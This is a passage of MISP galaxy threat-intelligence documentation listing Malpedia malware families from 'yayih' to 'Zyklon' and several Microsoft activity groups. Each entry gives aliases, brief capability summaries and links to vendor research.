The tag is: misp-galaxy:malpedia="yayih"

yayih is also known as:

aumlib
bbsinfo

Table 2953. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.yayih
https://www.fireeye.com/blog/threat-research/2013/08/survival-of-the-fittest-new-york-times-attackers-evolve-quickly.html

Yellow Cockatoo RAT

The tag is: misp-galaxy:malpedia="Yellow Cockatoo RAT"

Yellow Cockatoo RAT is also known as:

Polazer

Table 2954. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.yellow_cockatoo
https://redcanary.com/blog/yellow-cockatoo/

Yoddos

The tag is: misp-galaxy:malpedia="Yoddos"

Yoddos is also known as:

Table 2955. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.yoddos
https://www.bitdefender.com/files/News/CaseStudies/study/271/Bitdefender-Whitepaper-Scranos-2.pdf

YoungLotus

Simple malware with proxy/RDP and download capabilities. It often comes bundled with installers, in particular in the Chinese realm.

PE timestamps suggest that it came into existence in the second half of 2014.

Some versions perform checks of the status of the internet connection (InternetGetConnectedState: MODEM, LAN, PROXY), some versions perform simple AV process-checks (CreateToolhelp32Snapshot).

The tag is: misp-galaxy:malpedia="YoungLotus"

YoungLotus is also known as:

DarkShare

Table 2956. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.younglotus
https://www.youtube.com/watch?v=AUGxYhE_CUY

yty

The tag is: misp-galaxy:malpedia="yty"

yty is also known as:

Table 2957. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.yty
http://blog.ptsecurity.com/2019/11/studying-donot-team.html
https://ti.360.net/blog/articles/latest-activity-of-apt-c-35/
https://www.secureworks.com/research/threat-profiles/zinc-emerson
https://www.arbornetworks.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia/
https://threatrecon.nshc.net/2019/08/02/sectore02-updates-yty-framework-in-new-targeted-campaign-against-pakistan-government/

Z3

Ransomware.

The tag is: misp-galaxy:malpedia="Z3"

Z3 is also known as:

Z3enc Ransomware

Table 2958. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.z3
https://id-ransomware.blogspot.com/2020/08/z3-ransomware.html

Zacinlo

Bitdefender describes the primary features of the family as follows: Presence of a rootkit driver that protects itself as well as its other components, presence of man-in-the-browser capabilities that intercepts and decrypts SSL communications, and presence of an adware cleanup routine used to remove potential competition in the adware space. It also communicates with its C&C server, sending environment information such as installed AV and other applications. The malware also takes screenshots and does browser redirects, potentially manipulating the DOM tree. It also creates traffic in hidden windows, likely causing adfraud. The malware is generally very configurable and internally makes use of Lua scripts.

The tag is: misp-galaxy:malpedia="Zacinlo"

Zacinlo is also known as:

s5mark

Table 2959. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.zacinlo
https://labs.bitdefender.com/wp-content/uploads/downloads/six-years-and-counting-inside-the-complex-zacinlo-ad-fraud-operation/

Zebrocy

The tag is: misp-galaxy:malpedia="Zebrocy"

Zebrocy is also known as:

Zekapab

Table 2960. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy
https://www.bleepingcomputer.com/news/security/russian-hackers-use-fake-nato-training-docs-to-breach-govt-networks/
https://www.vkremez.com/2018/12/lets-learn-dissecting-apt28sofacy.html
https://quointelligence.eu/2020/09/apt28-zebrocy-malware-campaign-nato-theme/
https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government
https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/
https://www.welivesecurity.com/2018/11/20/sednit-whats-going-zebrocy/
https://securelist.com/greyenergys-overlap-with-zebrocy/89506/
https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b
https://www.vkremez.com/2018/12/lets-learn-reviewing-sofacys-zebrocy-c.html
https://research.checkpoint.com/malware-against-the-c-monoculture/
https://mp.weixin.qq.com/s/pE_6VRDk-2aTI996sff0og
https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries
https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/
https://mp.weixin.qq.com/s/6R7bFs9lH1I3BNdkatCC9g
https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf
https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
https://securelist.com/zebrocys-multilanguage-malware-salad/90680/
https://securelist.com/apt-trends-report-q2-2019/91897/
https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf
https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/
https://unit42.paloaltonetworks.com/sofacy-creates-new-go-variant-of-zebrocy-tool/
https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf
https://www.welivesecurity.com/2019/09/24/no-summer-vacations-zebrocy/
https://meltx0r.github.io/tech/2019/10/24/apt28.html
https://www.accenture.com/us-en/blogs/blogs-snakemackerel-delivers-zekapab-malware
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf
https://www.secureworks.com/research/threat-profiles/iron-twilight
https://securelist.com/a-zebrocy-go-downloader/89419/

Zebrocy (AutoIT)

The tag is: misp-galaxy:malpedia="Zebrocy (AutoIT)"

Zebrocy (AutoIT) is also known as:

Table 2961. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy_au3
https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
https://www.secureworks.com/research/threat-profiles/iron-twilight

Zedhou

The tag is: misp-galaxy:malpedia="Zedhou"

Zedhou is also known as:

Table 2962. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.zedhou

zenar

The tag is: misp-galaxy:malpedia="zenar"

zenar is also known as:

Table 2963. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.zenar
https://twitter.com/3xp0rtblog/status/1387996083712888832?s=20

Zeoticus

The tag is: misp-galaxy:malpedia="Zeoticus"

Zeoticus is also known as:

Table 2964. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.zeoticus
https://labs.sentinelone.com/zeoticus-2-0-ransomware-with-no-c2-required/

Zeppelin

Zeppelin is a ransomware written in Delphi and sold a as-a-service. The Cylance research team notes that it is a clear evolution of the known VegaLocker, but they assessed it as a new family becaue of additionally developed modules that makes Zeppelin much more configurable than Vegalocker. There are executable variants of type DLL and EXE.

The tag is: misp-galaxy:malpedia="Zeppelin"

Zeppelin is also known as:

Table 2965. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.zeppelin
https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf
https://threatvector.cylance.com/en_us/home/zeppelin-russian-ransomware-targets-high-profile-users-in-the-us-and-europe.html
https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf
https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/
https://www.gdatasoftware.com/blog/2020/06/35946-burans-transformation-into-zeppelin
https://storage.pardot.com/272312/124918/Flashpoint_Hunt_Team_Zeppelin_Ransomware_Analysis.pdf[https://storage.pardot.com/272312/124918/Flashpoint_Hunt_Team_Zeppelin_Ransomware_Analysis.pdf]
https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618

ZeroAccess

The tag is: misp-galaxy:malpedia="ZeroAccess"

ZeroAccess is also known as:

Max++
Sirefef
Smiscer

Table 2966. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroaccess
http://contagiodump.blogspot.com/2010/11/zeroaccess-max-smiscer-crimeware.html
http://resources.infosecinstitute.com/zeroaccess-malware-part-3-the-device-driver-process-injection-rootkit/
https://www.researchgate.net/profile/Lorenzo-De-Carli/publication/320250366_Botnet_protocol_inference_in_the_presence_of_encrypted_traffic/links/5fa9608792851cc286a08592/Botnet-protocol-inference-in-the-presence-of-encrypted-traffic.pdf?origin=publication_detail
https://blog.malwarebytes.com/threat-analysis/2013/08/sophos-discovers-zeroaccess-using-rlo/
http://resources.infosecinstitute.com/zeroaccess-malware-part-4-tracing-the-crimeware-origins-by-reversing-injected-code/
http://resources.infosecinstitute.com/step-by-step-tutorial-on-reverse-engineering-malware-the-zeroaccessmaxsmiscer-crimeware-rootkit/
http://contagiodump.blogspot.com/2012/12/zeroaccess-sirefef-rootkit-5-fresh.html
http://resources.infosecinstitute.com/zeroaccess-malware-part-2-the-kernel-mode-device-driver-stealth-rootkit/
https://www.virusbulletin.com/virusbulletin/2016/01/paper-notes-click-fraud-american-story/
https://blog.malwarebytes.com/threat-analysis/2013/07/zeroaccess-anti-debug-uses-debugger/

ZeroCleare

ZeroCleare is a destructive malware. It has been developed in order to wipe the master boot record section in order to damage a disk’s partitioning. Attackers use the EldoS RawDisk driver to perform the malicious action, which is not a signed driver and would therefore not runnable by default. The attackers managed to install it by using a vulnerable version of VBoxDrv driver, which the DSE accepts and runs. Used to attack middle-east energy and industrial sectors.

The tag is: misp-galaxy:malpedia="ZeroCleare"

ZeroCleare is also known as:

Table 2967. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.zerocleare
https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf
https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf
https://www.ibm.com/downloads/cas/OAJ4VZNJ

ZeroEvil

ZeroEvil is a malware that seems to be distributed by an ARSguarded VBS loader.

It first connects to a gate.php (version=). Upon success, an embedded VBS gets started connecting to logs_gate.php (plugin=, report=). So far, only one embedded VBS was observed: it creates and starts a PowerShell script to retrieve all password from the Windows.Security.Credentials.PasswordVault. Apart from that, a screenshot is taken and a list of running processes generated.

The ZeroEvil executable contains multiple DLLs, sqlite3.dll, ze_core.DLL (Mutex) and ze_autorun.DLL (Run-Key).

The tag is: misp-galaxy:malpedia="ZeroEvil"

ZeroEvil is also known as:

Table 2968. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroevil
https://www.blueliv.com/blog-news/research/ars-loader-evolution-zeroevil-ta545-airnaine/

ZeroLocker

The tag is: misp-galaxy:malpedia="ZeroLocker"

ZeroLocker is also known as:

Table 2969. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.zerolocker
http://stopmalvertising.com/malware-reports/introduction-to-the-zerolocker-ransomware.html

ZeroT

The tag is: misp-galaxy:malpedia="ZeroT"

ZeroT is also known as:

Table 2970. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.zerot
https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx

Zeus

The tag is: misp-galaxy:malpedia="Zeus"

Zeus is also known as:

Zbot

Table 2971. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus
https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf
https://www.s21sec.com/en/zeus-the-missing-link/
https://www.secureworks.com/research/threat-profiles/gold-evergreen
http://contagiodump.blogspot.com/2010/07/zeus-trojan-research-links.html
https://www.symantec.com/connect/blogs/spyeye-s-kill-zeus-bark-worse-its-bite
http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html
https://www.justice.gov/opa/pr/four-individuals-plead-guilty-rico-conspiracy-involving-bulletproof-hosting-cybercriminals
https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group
https://securelist.com/financial-cyberthreats-in-2020/101638/
http://malwareint.blogspot.com/2010/02/zeus-on-irs-scam-remains-actively.html
https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf
https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/
http://eternal-todo.com/blog/new-zeus-binary
https://www.kryptoslogic.com/blog/2021/07/trickbot-and-zeus/
http://www.secureworks.com/research/threat-profiles/gold-evergreen
https://www.wired.com/2017/03/russian-hacker-spy-botnet/
https://www.youtube.com/watch?v=LUxOcpIRxmg
https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf
http://malwareint.blogspot.com/2010/01/leveraging-zeus-to-send-spam-through.html
http://eternal-todo.com/blog/zeus-spreading-facebook
http://malwareint.blogspot.com/2010/03/new-phishing-campaign-against-facebook.html
https://www.anomali.com/files/white-papers/russian-federation-country-profile.pdf
https://www.secureworks.com/research/zeus?threat=zeus
https://www.secureworks.com/research/threat-profiles/bronze-woodland
http://contagiodump.blogspot.com/2010/07/zeus-version-scheme-by-trojan-author.html
http://eternal-todo.com/blog/detecting-zeus
https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf
https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/
https://nakedsecurity.sophos.com/2010/07/24/sample-run/
https://www.mnin.org/write/ZeusMalware.pdf
https://www.symantec.com/connect/blogs/brief-look-zeuszbot-20
https://us-cert.cisa.gov/ncas/alerts/aa20-345a
https://blog.malwarebytes.com/101/2021/07/the-life-and-death-of-the-zeus-trojan/
http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/zeus_king_of_bots.pdf
http://malwareint.blogspot.com/2010/02/facebook-phishing-campaign-proposed-by.html
http://malwareint.blogspot.com/2009/07/special-zeus-botnet-for-dummies.html

ZeusAction

The tag is: misp-galaxy:malpedia="ZeusAction"

ZeusAction is also known as:

Table 2972. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_action
https://twitter.com/benkow_/status/1136983062699487232
https://www.youtube.com/watch?v=EyDiIAtdI[https://www.youtube.com/watch?v=EyDiIAtdI]

Zeus MailSniffer

The tag is: misp-galaxy:malpedia="Zeus MailSniffer"

Zeus MailSniffer is also known as:

Table 2973. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_mailsniffer

Zeus OpenSSL

This family describes the Zeus-variant that includes a version of OpenSSL and usually is downloaded by Zloader.

In June 2016, the version 1.5.4.0 (PE timestamp: 2016.05.11) appeared, downloaded by Zloader (known as DEloader at that time). OpenSSL 1.0.1p is statically linked to it, thus its size is roughly 1.2 MB. In subsequent months, that size increased up to 1.6 MB. In January 2017, with version 1.14.8.0, OpenSSL 1.0.2j was linked to it, increasing the size to 1.8 MB. Soon after also in January 2017, with version v1.15.0.0 the code was obfuscated, blowing up the size of the binary to 2.2 MB.

Please note that IBM X-Force decided to call win.zloader/win.zeus_openssl "Zeus Sphinx", after mentioning it as "a new version of Zeus Sphinx" in their initial post in August 2016. Malpedia thus lists the alias "Zeus XSphinx" for win.zeus_openssl - the X to refer to IBM X-Force.

Zeus Sphinx on the one hand has the following versioning ("slow increase") - 2015/09 v1.0.1.0 (Zeus Sphinx size: 1.5 MB) - 2016/02 v1.0.1.2 (Zeus Sphinx size: 1.5 MB) - 2016/04 v1.0.2.0 (Zeus Sphinx size: 1.5 MB)

Zeus OpenSSL on the other hand has the following versioning ("fast increase") - 2016/05 v1.5.4.0 (Zeus OpenSSL size: 1.2 MB) - 2017/01 v1.14.8.0 (Zeus OpenSSL size: 1.8 MB) - 2017/01 v1.15.0.0 (Zeus OpenSSL size: 2.2 MB)

The tag is: misp-galaxy:malpedia="Zeus OpenSSL"

Zeus OpenSSL is also known as:

XSphinx

Table 2974. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_openssl
https://securityintelligence.com/posts/zeus-sphinx-trojan-awakens-amidst-coronavirus-spam-frenzy/
https://securityintelligence.com/brazil-cant-catch-a-break-after-panda-comes-the-sphinx/
https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/

Zeus Sphinx

This family describes the vanilla Zeus-variant that includes TOR (and Polipo proxy). It has an almost 90% overlap with Zeus v2.0.8.9. Please note that IBM X-Force decided to call win.zloader/win.zeus_openssl "Zeus Sphinx", after mentioning it as "a new version of Zeus Sphinx" in their initial post in August 2016. Malpedia thus lists the alias "Zeus XSphinx" for win.zeus_openssl - the X to refer to IBM X-Force.

The tag is: misp-galaxy:malpedia="Zeus Sphinx"

Zeus Sphinx is also known as:

Table 2975. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_sphinx
https://securityaffairs.co/wordpress/39592/cyber-crime/sphinx-variant-zeus-trojan.html
https://web.archive.org/web/20160130165709/http://darkmatters.norsecorp.com/2015/08/24/sphinx-new-zeus-variant-for-sale-on-the-black-market/

Zezin

The tag is: misp-galaxy:malpedia="Zezin"

Zezin is also known as:

Table 2976. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.zezin
https://twitter.com/siri_urz/status/923479126656323584

zgRAT

The tag is: misp-galaxy:malpedia="zgRAT"

zgRAT is also known as:

Table 2977. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat
https://bazaar.abuse.ch/browse/signature/zgRAT/

ZhCat

The tag is: misp-galaxy:malpedia="ZhCat"

ZhCat is also known as:

Table 2978. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.zhcat
https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf

ZhMimikatz

The tag is: misp-galaxy:malpedia="ZhMimikatz"

ZhMimikatz is also known as:

Table 2979. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.zhmimikatz
https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf
https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf

ZitMo

The tag is: misp-galaxy:malpedia="ZitMo"

ZitMo is also known as:

ZeuS-in-the-Mobile

Table 2980. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.zitmo
https://securelist.com/zeus-in-the-mobile-facts-and-theories/36424/
https://mobisec.reyammer.io/slides

ZiyangRAT

The tag is: misp-galaxy:malpedia="ZiyangRAT"

ZiyangRAT is also known as:

Table 2981. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ziyangrat
https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators

Zloader

This family describes the (initially small) loader, which downloads Zeus OpenSSL.

In June 2016, a new loader was dubbed DEloader by Fortinet. It has some functions borrowed from Zeus 2.0.8.9 (e.g. the versioning, nrv2b, binstorage-labels), but more importantly, it downloaded a Zeus-like banking trojan (→ Zeus OpenSSL). Furthermore, the loader shared its versioning with the Zeus OpenSSL it downloaded. The initial samples from May 2016 were small (17920 bytes). At some point, visualEncrypt/Decrypt was added, e.g. in v1.11.0.0 (September 2016) with size 27648 bytes. In January 2017 with v1.15.0.0, obfuscation was added, which blew the size up to roughly 80k, and the loader became known as Zloader aka Terdot. These changes may be related to the Moskalvzapoe Distribution Network, which started the distribution of it at the same time.

The tag is: misp-galaxy:malpedia="Zloader"

Zloader is also known as:

DELoader
Terdot

Table 2982. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.zloader
https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/
https://securityliterate.com/chantays-resume-investigating-a-cv-themed-zloader-malware-campaign/
https://www.sentinelone.com/labs/hide-and-seek-new-zloader-infection-chain-comes-with-improved-stealth-and-evasion-mechanisms/
https://twitter.com/ffforward/status/1324281530026524672
https://twitter.com/VK_Intel/status/1294320579311435776
https://clickallthethings.wordpress.com/2020/09/21/zloader-xlm-update-macro-code-and-behavior-change/
https://securityintelligence.com/around-the-world-with-zeus-sphinx-from-canada-to-australia-and-back/
https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/
https://cybleinc.com/2021/04/19/zloader-returns-through-spelevo-exploit-kit-phishing-campaign/
https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf
https://info.phishlabs.com/blog/surge-in-zloader-attacks-observed
https://securityintelligence.com/posts/zeus-sphinx-trojan-awakens-amidst-coronavirus-spam-frenzy/
https://blogs.quickheal.com/zloader-entailing-different-office-files/
https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/
https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://web.archive.org/web/20200929145931/https://www.comae.com/posts/2020-03-13_yet-another-active-email-campaign-with-malicious-excel-files-identified/
https://www.bleepingcomputer.com/news/security/banking-malware-spreading-via-covid-19-relief-payment-phishing/
https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf
https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/
https://johannesbader.ch/blog/the-dga-of-zloader/
https://int0xcc.svbtle.com/dissecting-obfuscated-deloader-malware
https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/
https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html
https://info.phishlabs.com/blog/zloader-dominates-email-payloads-in-q1
https://clickallthethings.wordpress.com/2020/06/19/zloader-vba-r1c1-references-and-other-tomfoolery/
https://www.fortinet.com/blog/threat-research/the-curious-case-of-an-unknown-trojan-targeting-german-speaking-users.html
https://www.guidepointsecurity.com/from-zloader-to-darkside-a-ransomware-story/
https://www.hornetsecurity.com/en/threat-research/zloader-email-campaign-using-mhtml-to-download-and-decrypt-xls/
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/
https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/
https://resources.malwarebytes.com/files/2020/05/The-Silent-Night-Zloader-Zbot_Final.pdf
https://www.forcepoint.com/blog/security-labs/zeus-delivered-deloader-defraud-customers-canadian-banks
https://www.comae.com/posts/2020-03-13_yet-another-active-email-campaign-with-malicious-excel-files-identified/
https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/
https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf
https://www.proofpoint.com/us/blog/threat-insight/zloader-loads-again-new-zloader-variant-returns
https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service/
https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html
https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/
https://www.youtube.com/watch?v=QBoj6GB79wM
https://securityintelligence.com/zeus-sphinx-pushes-empty-configuration-files-what-has-the-sphinx-got-cooking/
https://blag.nullteilerfrei.de/2020/05/24/zloader-string-obfuscation/
https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries
https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf
https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf
https://blog.malwarebytes.com/threat-analysis/2020/11/malsmoke-operators-abandon-exploit-kits-in-favor-of-social-engineering-scheme/
https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/zloader-campaigns-at-a-glance
https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex
https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/
https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf
https://labs.k7computing.com/?p=22458
https://blog.alyac.co.kr/3322
https://blag.nullteilerfrei.de/2020/06/11/api-hashing-in-the-zloader-malware/
https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-zip-based-campaign/
https://insight-jp.nttsecurity.com/post/102gsqj/pseudogatespelevo-exploit-kit
https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/
https://www.forcepoint.com/blog/x-labs/invoicing-spam-campaigns-malware-zloader
https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/
https://www.lac.co.jp/lacwatch/people/20201106_002321.html

Zlob

The tag is: misp-galaxy:malpedia="Zlob"

Zlob is also known as:

Table 2983. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.zlob
https://blag.nullteilerfrei.de/2020/08/23/programmatically-nop-the-current-selection-in-ghidra/
https://en.wikipedia.org/wiki/Zlob_trojan

ZUpdater

The tag is: misp-galaxy:malpedia="ZUpdater"

ZUpdater is also known as:

Zpevdo

Table 2984. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.zupdater
https://app.any.run/tasks/ea024149-8e83-41c0-b0ed-32ec38dea4a6/

ZXShell

According to FireEye, ZXSHELL is a backdoor that can be downloaded from the internet, particularly Chinese hacker websites. The backdoor can launch port scans, run a keylogger, capture screenshots, set up an HTTP or SOCKS proxy, launch a reverse command shell, cause SYN floods, and transfer/delete/run files. The publicly available version of the tool provides a graphical user interface that malicious actors can use to interact with victim backdoors. Simplified Chinese is the language used for the bundled ZXSHELL documentation.

The tag is: misp-galaxy:malpedia="ZXShell"

ZXShell is also known as:

Sensocode

Table 2985. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.zxshell
https://risky.biz/whatiswinnti/
https://github.com/smb01/zxshell
https://lab52.io/blog/apt27-rootkit-updates/
https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf
https://meltx0r.github.io/tech/2019/09/19/emissary-panda-apt.html
https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox
https://www.secureworks.com/research/threat-profiles/bronze-union
https://content.fireeye.com/apt-41/rpt-apt41
https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf
https://www.secureworks.com/research/threat-profiles/bronze-keystone
https://blogs.cisco.com/security/talos/opening-zxshell
https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-GuPan.pdf

Zyklon

The tag is: misp-galaxy:malpedia="Zyklon"

Zyklon is also known as:

Table 2986. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.zyklon
https://www.fireeye.com/blog/threat-research/2018/01/microsoft-office-vulnerabilities-used-to-distribute-zyklon-malware.html
https://blog.talosintelligence.com/2017/05/modified-zyklon-and-plugins-from-india.html

Microsoft Activity Group actor

Activity groups as described by Microsoft.

Microsoft Activity Group actor is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.

authors: Various

PROMETHIUM

PROMETHIUM is an activity group that has been active as early as 2012. The group primarily uses Truvasys, a first-stage malware that has been in circulation for several years. Truvasys has been involved in several attack campaigns, where it has masqueraded as one of server common computer utilities, including WinUtils, TrueCrypt, WinRAR, or SanDisk. In each of the campaigns, Truvasys malware evolved with additional features—this shows a close relationship between the activity groups behind the campaigns and the developers of the malware.

The tag is: misp-galaxy:microsoft-activity-group="PROMETHIUM"

View relationships graph

PROMETHIUM has relationships with:

similar: misp-galaxy:mitre-intrusion-set="PROMETHIUM - G0056" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:threat-actor="PROMETHIUM" with estimative-language:likelihood-probability="likely"

Table 2987. Table References
Links
https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/

NEODYMIUM

NEODYMIUM is an activity group that is known to use a backdoor malware detected by Microsoft as Wingbird. This backdoor’s characteristics closely match FinFisher, a government-grade commercial surveillance package. Data about Wingbird activity indicate that it is typically used to attack individual computers instead of networks.

The tag is: misp-galaxy:microsoft-activity-group="NEODYMIUM"

View relationships graph

NEODYMIUM has relationships with:

similar: misp-galaxy:mitre-intrusion-set="NEODYMIUM - G0055" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:threat-actor="NEODYMIUM" with estimative-language:likelihood-probability="likely"

Table 2988. Table References
Links
https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/

TERBIUM

Microsoft Threat Intelligence identified similarities between this recent attack and previous 2012 attacks against tens of thousands of computers belonging to organizations in the energy sector. Microsoft Threat Intelligence refers to the activity group behind these attacks as TERBIUM, following our internal practice of assigning rogue actors chemical element names.

The tag is: misp-galaxy:microsoft-activity-group="TERBIUM"

View relationships graph

TERBIUM has relationships with:

similar: misp-galaxy:threat-actor="TERBIUM" with estimative-language:likelihood-probability="likely"

Table 2989. Table References
Links
https://blogs.technet.microsoft.com/mmpc/2016/12/09/windows-10-protection-detection-and-response-against-recent-attacks/

STRONTIUM

STRONTIUM has been active since at least 2007. Whereas most modern untargeted malware is ultimately profit-oriented, STRONTIUM mainly seeks sensitive information. Its primary institutional targets have included government bodies, diplomatic institutions, and military forces and installations in NATO member states and certain Eastern European countries. Additional targets have included journalists, political advisors, and organizations associated with political activism in central Asia. STRONTIUM is an activity group that usually targets government agencies, diplomatic institutions, and military organizations, as well as affiliated private sector organizations such as defense contractors and public policy research institutes. Microsoft has attributed more 0-day exploits to STRONTIUM than any other tracked group in 2016. STRONTIUM frequently uses compromised e-mail accounts from one victim to send malicious e-mails to a second victim and will persistently pursue specific targets for months until they are successful in compromising the victims’ computer.

The tag is: misp-galaxy:microsoft-activity-group="STRONTIUM"

STRONTIUM is also known as:

APT 28
APT28
Pawn Storm
Fancy Bear
Sednit
TsarTeam
